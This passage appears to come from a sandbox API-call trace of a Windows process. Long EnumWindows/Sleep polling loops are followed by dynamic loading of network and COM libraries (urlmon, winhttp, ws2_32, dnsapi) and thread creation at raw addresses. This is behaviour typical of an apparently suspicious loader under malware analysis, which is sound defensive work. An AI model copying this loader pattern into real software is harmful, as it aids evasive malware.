EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.136] Sleep (dwMilliseconds=0x64) [0300.223] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.224] Sleep (dwMilliseconds=0x64) [0300.344] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.345] Sleep (dwMilliseconds=0x64) [0300.375] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.376] Sleep (dwMilliseconds=0x64) [0300.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.422] Sleep (dwMilliseconds=0x64) [0300.450] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.450] Sleep (dwMilliseconds=0x64) [0300.511] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.512] Sleep (dwMilliseconds=0x64) [0300.561] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.562] Sleep (dwMilliseconds=0x64) [0300.638] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.639] Sleep (dwMilliseconds=0x64) [0300.696] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.697] Sleep (dwMilliseconds=0x64) [0300.738] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.739] Sleep (dwMilliseconds=0x64) [0300.816] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.817] Sleep (dwMilliseconds=0x64) [0300.879] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.880] Sleep (dwMilliseconds=0x64) [0300.916] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.917] Sleep (dwMilliseconds=0x64) [0300.956] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.956] Sleep (dwMilliseconds=0x64) [0300.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.967] Sleep (dwMilliseconds=0x64) [0301.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.027] Sleep (dwMilliseconds=0x64) [0301.108] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.108] Sleep (dwMilliseconds=0x64) [0301.246] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.247] Sleep (dwMilliseconds=0x64) [0301.298] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.298] Sleep (dwMilliseconds=0x64) [0301.347] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.348] Sleep (dwMilliseconds=0x64) [0301.421] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.422] Sleep (dwMilliseconds=0x64) [0301.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.466] Sleep (dwMilliseconds=0x64) [0301.534] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.538] Sleep (dwMilliseconds=0x64) [0301.583] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.584] Sleep (dwMilliseconds=0x64) [0301.629] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.629] Sleep (dwMilliseconds=0x64) [0301.696] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.697] Sleep (dwMilliseconds=0x64) [0301.760] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.760] Sleep (dwMilliseconds=0x64) [0301.853] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0301.854] Sleep (dwMilliseconds=0x64) [0302.853] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0302.853] Sleep (dwMilliseconds=0x64) [0302.918] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0302.918] Sleep (dwMilliseconds=0x64) [0302.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0302.968] Sleep (dwMilliseconds=0x64) [0303.150] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0303.153] Sleep (dwMilliseconds=0x64) [0303.266] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0303.267] Sleep (dwMilliseconds=0x64) [0303.812] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0303.813] Sleep (dwMilliseconds=0x64) [0303.934] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0303.934] Sleep (dwMilliseconds=0x64) [0303.988] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0303.989] Sleep (dwMilliseconds=0x64) [0304.052] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.053] Sleep (dwMilliseconds=0x64) [0304.207] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.208] Sleep (dwMilliseconds=0x64) [0304.324] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.325] Sleep (dwMilliseconds=0x64) [0304.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.418] Sleep (dwMilliseconds=0x64) [0304.515] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.516] Sleep (dwMilliseconds=0x64) [0304.581] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.582] Sleep (dwMilliseconds=0x64) [0304.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.654] Sleep (dwMilliseconds=0x64) [0304.688] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.693] Sleep (dwMilliseconds=0x64) [0304.758] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.759] Sleep (dwMilliseconds=0x64) [0304.934] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.935] Sleep (dwMilliseconds=0x64) [0304.996] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0304.999] Sleep (dwMilliseconds=0x64) [0305.046] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0305.047] Sleep (dwMilliseconds=0x64) [0305.187] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0305.188] Sleep (dwMilliseconds=0x64) [0305.375] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0305.375] Sleep (dwMilliseconds=0x64) Thread: id = 51 os_tid = 0xfd8 Thread: id = 159 os_tid = 0xd94 Thread: id = 161 os_tid = 0xd4c Thread: id = 162 os_tid = 0xd48 Thread: id = 163 os_tid = 0xd44 Thread: id = 175 os_tid = 0xcd4 Thread: id = 179 os_tid = 0xcb8 [0195.593] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffa16770000 [0195.594] GetProcAddress (hModule=0x7ffa16770000, lpProcName="RtlExitUserThread") returned 0x7ffa167cc2a0 [0195.596] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x85a0000 [0195.598] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x10) returned 0x85a0830 [0195.598] LoadLibraryA (lpLibFileName="user32") returned 0x7ffa13d80000 [0195.598] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x10 [0195.610] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.611] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x12) returned 0x85a0830 [0195.611] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffa15090000 [0195.613] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x12 [0195.613] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.613] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x10) returned 0x85a0830 [0195.613] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffa09580000 [0195.614] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x10 [0195.614] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.614] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0xf) returned 0x85a0830 [0195.614] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffa13b70000 [0195.615] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0xf [0195.615] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.615] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x11) returned 0x85a0830 [0195.615] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffa0ed60000 [0195.616] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x11 [0195.616] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.616] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x10) returned 0x85a0830 [0195.616] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffa146e0000 [0195.617] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x10 [0195.617] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.617] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x10) returned 0x85a0830 [0195.617] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffa11800000 [0195.618] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x10 [0195.618] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x11) returned 0x85a0830 [0195.618] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffa15210000 [0195.619] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x11 [0195.619] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0195.671] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0195.673] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeEx") returned 0x7ffa143a2c50 [0195.673] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0195.674] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeSecurity") returned 0x7ffa14375fe0 [0195.674] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0195.676] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoCreateInstance") returned 0x7ffa143dfb70 [0195.676] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0195.677] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoUninitialize") returned 0x7ffa143a1540 [0195.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1e63ca4, lpParameter=0x1e50000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x228c [0195.678] CloseHandle (hObject=0x228c) returned 1 [0195.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1e63d80, lpParameter=0x1e50000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x228c [0195.678] CloseHandle (hObject=0x228c) returned 1 [0195.678] Sleep (dwMilliseconds=0xa) [0195.794] Sleep (dwMilliseconds=0xa) [0195.839] Sleep (dwMilliseconds=0xa) [0195.932] Sleep (dwMilliseconds=0xa) [0196.029] Sleep (dwMilliseconds=0xa) [0196.074] Sleep (dwMilliseconds=0xa) [0196.167] Sleep (dwMilliseconds=0xa) [0196.233] Sleep (dwMilliseconds=0xa) [0196.302] Sleep (dwMilliseconds=0xa) [0196.353] Sleep (dwMilliseconds=0xa) [0196.501] Sleep (dwMilliseconds=0xa) [0196.645] Sleep (dwMilliseconds=0xa) [0196.772] Sleep (dwMilliseconds=0xa) [0196.958] Sleep (dwMilliseconds=0xa) [0197.052] Sleep (dwMilliseconds=0xa) [0197.166] Sleep (dwMilliseconds=0xa) [0197.244] Sleep (dwMilliseconds=0xa) [0197.371] Sleep (dwMilliseconds=0xa) [0197.422] Sleep (dwMilliseconds=0xa) [0197.465] Sleep (dwMilliseconds=0xa) [0197.534] Sleep (dwMilliseconds=0xa) [0197.587] Sleep (dwMilliseconds=0xa) [0197.629] Sleep (dwMilliseconds=0xa) [0197.762] Sleep (dwMilliseconds=0xa) [0197.856] Sleep (dwMilliseconds=0xa) [0197.955] Sleep (dwMilliseconds=0xa) [0198.033] Sleep (dwMilliseconds=0xa) [0198.124] Sleep (dwMilliseconds=0xa) [0198.185] Sleep (dwMilliseconds=0xa) [0198.235] Sleep (dwMilliseconds=0xa) [0198.294] Sleep (dwMilliseconds=0xa) [0198.307] Sleep (dwMilliseconds=0xa) [0198.344] Sleep (dwMilliseconds=0xa) [0198.386] Sleep (dwMilliseconds=0xa) [0198.451] Sleep (dwMilliseconds=0xa) [0198.501] Sleep (dwMilliseconds=0xa) [0198.561] Sleep (dwMilliseconds=0xa) [0198.656] Sleep (dwMilliseconds=0xa) [0198.741] Sleep (dwMilliseconds=0xa) [0198.786] Sleep (dwMilliseconds=0xa) [0198.921] Sleep (dwMilliseconds=0xa) [0198.964] Sleep (dwMilliseconds=0xa) [0198.992] Sleep (dwMilliseconds=0xa) [0199.043] Sleep (dwMilliseconds=0xa) [0199.101] Sleep (dwMilliseconds=0xa) [0199.186] Sleep (dwMilliseconds=0xa) [0199.271] Sleep (dwMilliseconds=0xa) [0199.342] Sleep (dwMilliseconds=0xa) [0199.361] Sleep (dwMilliseconds=0xa) [0199.403] Sleep (dwMilliseconds=0xa) [0199.617] Sleep (dwMilliseconds=0xa) [0199.707] Sleep (dwMilliseconds=0xa) [0199.782] Sleep (dwMilliseconds=0xa) [0199.862] Sleep (dwMilliseconds=0xa) [0199.909] Sleep (dwMilliseconds=0xa) [0199.988] Sleep (dwMilliseconds=0xa) [0200.080] Sleep (dwMilliseconds=0xa) [0200.161] Sleep (dwMilliseconds=0xa) [0200.204] Sleep (dwMilliseconds=0xa) [0200.264] Sleep (dwMilliseconds=0xa) [0200.303] Sleep (dwMilliseconds=0xa) [0200.346] Sleep (dwMilliseconds=0xa) [0200.390] Sleep (dwMilliseconds=0xa) [0200.482] Sleep (dwMilliseconds=0xa) [0200.560] Sleep (dwMilliseconds=0xa) [0200.630] Sleep (dwMilliseconds=0xa) [0200.783] Sleep (dwMilliseconds=0xa) [0200.889] Sleep (dwMilliseconds=0xa) [0200.944] Sleep (dwMilliseconds=0xa) [0201.030] Sleep (dwMilliseconds=0xa) [0201.104] Sleep (dwMilliseconds=0xa) [0201.153] Sleep (dwMilliseconds=0xa) [0201.200] Sleep (dwMilliseconds=0xa) [0201.333] Sleep (dwMilliseconds=0xa) [0201.435] Sleep (dwMilliseconds=0xa) [0201.542] Sleep (dwMilliseconds=0xa) [0201.622] Sleep (dwMilliseconds=0xa) [0201.669] Sleep (dwMilliseconds=0xa) [0201.758] Sleep (dwMilliseconds=0xa) [0201.831] Sleep (dwMilliseconds=0xa) [0201.939] Sleep (dwMilliseconds=0xa) [0202.060] Sleep (dwMilliseconds=0xa) [0202.157] Sleep (dwMilliseconds=0xa) [0202.222] Sleep (dwMilliseconds=0xa) [0202.388] Sleep (dwMilliseconds=0xa) [0202.532] Sleep (dwMilliseconds=0xa) [0202.622] Sleep (dwMilliseconds=0xa) [0202.713] Sleep (dwMilliseconds=0xa) [0202.729] Sleep (dwMilliseconds=0xa) [0202.779] Sleep (dwMilliseconds=0xa) [0202.871] Sleep (dwMilliseconds=0xa) [0202.964] Sleep (dwMilliseconds=0xa) [0203.106] Sleep (dwMilliseconds=0xa) [0203.201] Sleep (dwMilliseconds=0xa) [0203.281] Sleep (dwMilliseconds=0xa) [0203.317] Sleep (dwMilliseconds=0xa) [0203.373] Sleep (dwMilliseconds=0xa) [0203.405] Sleep (dwMilliseconds=0xa) [0203.417] Sleep (dwMilliseconds=0xa) [0203.435] Sleep (dwMilliseconds=0xa) [0203.542] Sleep (dwMilliseconds=0xa) [0203.677] Sleep (dwMilliseconds=0xa) [0203.748] Sleep (dwMilliseconds=0xa) [0203.841] Sleep (dwMilliseconds=0xa) [0203.915] Sleep (dwMilliseconds=0xa) [0203.982] Sleep (dwMilliseconds=0xa) [0204.044] Sleep (dwMilliseconds=0xa) [0204.061] Sleep (dwMilliseconds=0xa) [0204.076] Sleep (dwMilliseconds=0xa) [0204.107] Sleep (dwMilliseconds=0xa) [0204.216] Sleep (dwMilliseconds=0xa) [0204.387] Sleep (dwMilliseconds=0xa) [0204.435] Sleep (dwMilliseconds=0xa) [0204.545] Sleep (dwMilliseconds=0xa) [0204.624] Sleep (dwMilliseconds=0xa) [0204.769] Sleep (dwMilliseconds=0xa) [0205.008] Sleep (dwMilliseconds=0xa) [0205.066] Sleep (dwMilliseconds=0xa) [0205.107] Sleep (dwMilliseconds=0xa) [0205.151] Sleep (dwMilliseconds=0xa) [0205.221] Sleep (dwMilliseconds=0xa) [0205.309] Sleep (dwMilliseconds=0xa) [0205.402] Sleep (dwMilliseconds=0xa) [0205.562] Sleep (dwMilliseconds=0xa) [0205.610] Sleep (dwMilliseconds=0xa) [0205.718] Sleep (dwMilliseconds=0xa) [0205.808] Sleep (dwMilliseconds=0xa) [0205.870] Sleep (dwMilliseconds=0xa) [0205.917] Sleep (dwMilliseconds=0xa) [0205.983] Sleep (dwMilliseconds=0xa) [0206.077] Sleep (dwMilliseconds=0xa) [0206.167] Sleep (dwMilliseconds=0xa) [0206.279] Sleep (dwMilliseconds=0xa) [0206.363] Sleep (dwMilliseconds=0xa) [0206.452] Sleep (dwMilliseconds=0xa) [0206.525] Sleep (dwMilliseconds=0xa) [0206.551] Sleep (dwMilliseconds=0xa) [0206.674] Sleep (dwMilliseconds=0xa) [0207.116] Sleep (dwMilliseconds=0xa) [0207.299] Sleep (dwMilliseconds=0xa) [0207.436] Sleep (dwMilliseconds=0xa) [0207.576] Sleep (dwMilliseconds=0xa) [0207.668] Sleep (dwMilliseconds=0xa) [0207.867] Sleep (dwMilliseconds=0xa) [0207.968] Sleep (dwMilliseconds=0xa) [0207.988] Sleep (dwMilliseconds=0xa) [0208.104] Sleep (dwMilliseconds=0xa) [0208.339] Sleep (dwMilliseconds=0xa) [0208.403] Sleep (dwMilliseconds=0xa) [0208.454] Sleep (dwMilliseconds=0xa) [0208.561] Sleep (dwMilliseconds=0xa) [0208.654] Sleep (dwMilliseconds=0xa) [0208.715] Sleep (dwMilliseconds=0xa) [0208.745] Sleep (dwMilliseconds=0xa) [0208.795] Sleep (dwMilliseconds=0xa) [0208.828] Sleep (dwMilliseconds=0xa) [0208.870] Sleep (dwMilliseconds=0xa) [0208.979] Sleep (dwMilliseconds=0xa) [0209.074] Sleep (dwMilliseconds=0xa) [0209.168] Sleep (dwMilliseconds=0xa) [0209.244] Sleep (dwMilliseconds=0xa) [0209.263] Sleep (dwMilliseconds=0xa) [0209.309] Sleep (dwMilliseconds=0xa) [0209.324] Sleep (dwMilliseconds=0xa) [0209.357] Sleep (dwMilliseconds=0xa) [0209.441] Sleep (dwMilliseconds=0xa) [0209.535] Sleep (dwMilliseconds=0xa) [0209.763] Sleep (dwMilliseconds=0xa) [0209.826] Sleep (dwMilliseconds=0xa) [0209.903] Sleep (dwMilliseconds=0xa) [0209.931] Sleep (dwMilliseconds=0xa) [0209.948] Sleep (dwMilliseconds=0xa) [0210.058] Sleep (dwMilliseconds=0xa) [0210.123] Sleep (dwMilliseconds=0xa) [0210.198] Sleep (dwMilliseconds=0xa) [0210.292] Sleep (dwMilliseconds=0xa) [0210.387] Sleep (dwMilliseconds=0xa) [0210.448] Sleep (dwMilliseconds=0xa) [0210.464] Sleep (dwMilliseconds=0xa) [0210.514] Sleep (dwMilliseconds=0xa) [0210.608] Sleep (dwMilliseconds=0xa) [0210.653] Sleep (dwMilliseconds=0xa) [0210.714] Sleep (dwMilliseconds=0xa) [0210.801] Sleep (dwMilliseconds=0xa) [0210.858] Sleep (dwMilliseconds=0xa) [0210.872] Sleep (dwMilliseconds=0xa) [0210.888] Sleep (dwMilliseconds=0xa) [0210.927] Sleep (dwMilliseconds=0xa) [0210.998] Sleep (dwMilliseconds=0xa) [0211.038] Sleep (dwMilliseconds=0xa) [0211.082] Sleep (dwMilliseconds=0xa) [0211.156] Sleep (dwMilliseconds=0xa) [0211.251] Sleep (dwMilliseconds=0xa) [0211.300] Sleep (dwMilliseconds=0xa) [0211.401] Sleep (dwMilliseconds=0xa) [0211.452] Sleep (dwMilliseconds=0xa) [0211.494] Sleep (dwMilliseconds=0xa) [0211.560] Sleep (dwMilliseconds=0xa) [0211.607] Sleep (dwMilliseconds=0xa) [0211.667] Sleep (dwMilliseconds=0xa) [0211.714] Sleep (dwMilliseconds=0xa) [0211.795] Sleep (dwMilliseconds=0xa) [0211.886] Sleep (dwMilliseconds=0xa) [0212.025] Sleep (dwMilliseconds=0xa) [0212.065] Sleep (dwMilliseconds=0xa) [0212.104] Sleep (dwMilliseconds=0xa) [0212.129] Sleep (dwMilliseconds=0xa) [0212.190] Sleep (dwMilliseconds=0xa) [0212.267] Sleep (dwMilliseconds=0xa) [0212.318] Sleep (dwMilliseconds=0xa) [0212.378] Sleep (dwMilliseconds=0xa) [0212.419] Sleep (dwMilliseconds=0xa) [0212.519] Sleep (dwMilliseconds=0xa) [0212.571] Sleep (dwMilliseconds=0xa) [0212.628] Sleep (dwMilliseconds=0xa) [0212.676] Sleep (dwMilliseconds=0xa) [0212.772] Sleep (dwMilliseconds=0xa) [0212.870] Sleep (dwMilliseconds=0xa) [0212.946] Sleep (dwMilliseconds=0xa) [0212.997] Sleep (dwMilliseconds=0xa) [0213.057] Sleep (dwMilliseconds=0xa) [0213.149] Sleep (dwMilliseconds=0xa) [0213.197] Sleep (dwMilliseconds=0xa) [0213.213] Sleep (dwMilliseconds=0xa) [0213.284] Sleep (dwMilliseconds=0xa) [0213.315] Sleep (dwMilliseconds=0xa) [0213.378] Sleep (dwMilliseconds=0xa) [0213.421] Sleep (dwMilliseconds=0xa) [0213.459] Sleep (dwMilliseconds=0xa) [0213.562] Sleep (dwMilliseconds=0xa) [0213.669] Sleep (dwMilliseconds=0xa) [0213.730] Sleep (dwMilliseconds=0xa) [0213.793] Sleep (dwMilliseconds=0xa) [0213.834] Sleep (dwMilliseconds=0xa) [0213.948] Sleep (dwMilliseconds=0xa) [0214.026] Sleep (dwMilliseconds=0xa) [0214.109] Sleep (dwMilliseconds=0xa) [0214.200] Sleep (dwMilliseconds=0xa) [0214.387] Sleep (dwMilliseconds=0xa) [0214.480] Sleep (dwMilliseconds=0xa) [0214.574] Sleep (dwMilliseconds=0xa) [0214.683] Sleep (dwMilliseconds=0xa) [0214.801] Sleep (dwMilliseconds=0xa) [0214.929] Sleep (dwMilliseconds=0xa) [0215.014] Sleep (dwMilliseconds=0xa) [0215.074] Sleep (dwMilliseconds=0xa) [0215.132] Sleep (dwMilliseconds=0xa) [0215.158] Sleep (dwMilliseconds=0xa) [0215.202] Sleep (dwMilliseconds=0xa) [0215.248] Sleep (dwMilliseconds=0xa) [0215.323] Sleep (dwMilliseconds=0xa) [0215.373] Sleep (dwMilliseconds=0xa) [0215.432] Sleep (dwMilliseconds=0xa) [0215.605] Sleep (dwMilliseconds=0xa) [0215.698] Sleep (dwMilliseconds=0xa) [0215.745] Sleep (dwMilliseconds=0xa) [0215.811] Sleep (dwMilliseconds=0xa) [0215.904] Sleep (dwMilliseconds=0xa) [0215.968] Sleep (dwMilliseconds=0xa) [0216.071] Sleep (dwMilliseconds=0xa) [0216.136] Sleep (dwMilliseconds=0xa) [0216.281] Sleep (dwMilliseconds=0xa) [0216.396] Sleep (dwMilliseconds=0xa) [0216.467] Sleep (dwMilliseconds=0xa) [0216.522] Sleep (dwMilliseconds=0xa) [0216.558] Sleep (dwMilliseconds=0xa) [0216.622] Sleep (dwMilliseconds=0xa) [0216.873] Sleep (dwMilliseconds=0xa) [0216.996] Sleep (dwMilliseconds=0xa) [0217.107] Sleep (dwMilliseconds=0xa) [0217.193] Sleep (dwMilliseconds=0xa) [0217.214] Sleep (dwMilliseconds=0xa) [0217.246] Sleep (dwMilliseconds=0xa) [0217.290] Sleep (dwMilliseconds=0xa) [0217.340] Sleep (dwMilliseconds=0xa) [0217.414] Sleep (dwMilliseconds=0xa) [0217.464] Sleep (dwMilliseconds=0xa) [0217.557] Sleep (dwMilliseconds=0xa) [0217.629] Sleep (dwMilliseconds=0xa) [0217.733] Sleep (dwMilliseconds=0xa) [0217.779] Sleep (dwMilliseconds=0xa) [0217.795] Sleep (dwMilliseconds=0xa) [0217.901] Sleep (dwMilliseconds=0xa) [0218.014] Sleep (dwMilliseconds=0xa) [0218.123] Sleep (dwMilliseconds=0xa) [0218.216] Sleep (dwMilliseconds=0xa) [0218.310] Sleep (dwMilliseconds=0xa) [0218.379] Sleep (dwMilliseconds=0xa) [0218.435] Sleep (dwMilliseconds=0xa) [0218.509] Sleep (dwMilliseconds=0xa) [0218.573] Sleep (dwMilliseconds=0xa) [0218.667] Sleep (dwMilliseconds=0xa) [0218.716] Sleep (dwMilliseconds=0xa) [0218.733] Sleep (dwMilliseconds=0xa) [0218.781] Sleep (dwMilliseconds=0xa) [0218.950] Sleep (dwMilliseconds=0xa) [0219.179] Sleep (dwMilliseconds=0xa) [0219.311] Sleep (dwMilliseconds=0xa) [0219.358] Sleep (dwMilliseconds=0xa) [0219.398] Sleep (dwMilliseconds=0xa) [0219.462] Sleep (dwMilliseconds=0xa) [0219.538] Sleep (dwMilliseconds=0xa) [0219.612] Sleep (dwMilliseconds=0xa) [0219.646] Sleep (dwMilliseconds=0xa) [0219.698] Sleep (dwMilliseconds=0xa) [0219.743] Sleep (dwMilliseconds=0xa) [0219.880] Sleep (dwMilliseconds=0xa) [0219.983] Sleep (dwMilliseconds=0xa) [0220.113] Sleep (dwMilliseconds=0xa) [0220.237] Sleep (dwMilliseconds=0xa) [0220.290] Sleep (dwMilliseconds=0xa) [0220.453] Sleep (dwMilliseconds=0xa) [0220.529] Sleep (dwMilliseconds=0xa) [0220.576] Sleep (dwMilliseconds=0xa) [0220.613] Sleep (dwMilliseconds=0xa) [0220.688] Sleep (dwMilliseconds=0xa) [0220.729] Sleep (dwMilliseconds=0xa) [0220.802] Sleep (dwMilliseconds=0xa) [0220.871] Sleep (dwMilliseconds=0xa) [0220.987] Sleep (dwMilliseconds=0xa) [0221.032] Sleep (dwMilliseconds=0xa) [0221.073] Sleep (dwMilliseconds=0xa) [0221.125] Sleep (dwMilliseconds=0xa) [0221.217] Sleep (dwMilliseconds=0xa) [0221.276] Sleep (dwMilliseconds=0xa) [0221.369] Sleep (dwMilliseconds=0xa) [0221.413] Sleep (dwMilliseconds=0xa) [0221.556] Sleep (dwMilliseconds=0xa) [0221.597] Sleep (dwMilliseconds=0xa) [0221.676] Sleep (dwMilliseconds=0xa) [0221.724] Sleep (dwMilliseconds=0xa) [0221.775] Sleep (dwMilliseconds=0xa) [0221.831] Sleep (dwMilliseconds=0xa) [0221.880] Sleep (dwMilliseconds=0xa) [0221.952] Sleep (dwMilliseconds=0xa) [0222.040] Sleep (dwMilliseconds=0xa) [0222.114] Sleep (dwMilliseconds=0xa) [0222.170] Sleep (dwMilliseconds=0xa) [0222.198] Sleep (dwMilliseconds=0xa) [0222.244] Sleep (dwMilliseconds=0xa) [0222.278] Sleep (dwMilliseconds=0xa) [0222.294] Sleep (dwMilliseconds=0xa) [0222.386] Sleep (dwMilliseconds=0xa) [0222.471] Sleep (dwMilliseconds=0xa) [0222.528] Sleep (dwMilliseconds=0xa) [0222.622] Sleep (dwMilliseconds=0xa) [0222.718] Sleep (dwMilliseconds=0xa) [0222.731] Sleep (dwMilliseconds=0xa) [0222.750] Sleep (dwMilliseconds=0xa) [0222.794] Sleep (dwMilliseconds=0xa) [0222.863] Sleep (dwMilliseconds=0xa) [0222.948] Sleep (dwMilliseconds=0xa) [0223.045] Sleep (dwMilliseconds=0xa) [0223.117] Sleep (dwMilliseconds=0xa) [0223.187] Sleep (dwMilliseconds=0xa) [0223.263] Sleep (dwMilliseconds=0xa) [0223.302] Sleep (dwMilliseconds=0xa) [0223.327] Sleep (dwMilliseconds=0xa) [0223.417] Sleep (dwMilliseconds=0xa) [0223.520] Sleep (dwMilliseconds=0xa) [0223.627] Sleep (dwMilliseconds=0xa) [0223.932] Sleep (dwMilliseconds=0xa) [0224.064] Sleep (dwMilliseconds=0xa) [0224.201] Sleep (dwMilliseconds=0xa) [0224.370] Sleep (dwMilliseconds=0xa) [0224.430] Sleep (dwMilliseconds=0xa) [0224.512] Sleep (dwMilliseconds=0xa) [0224.605] Sleep (dwMilliseconds=0xa) [0224.667] Sleep (dwMilliseconds=0xa) [0224.760] Sleep (dwMilliseconds=0xa) [0224.802] Sleep (dwMilliseconds=0xa) [0224.840] Sleep (dwMilliseconds=0xa) [0224.867] Sleep (dwMilliseconds=0xa) [0224.886] Sleep 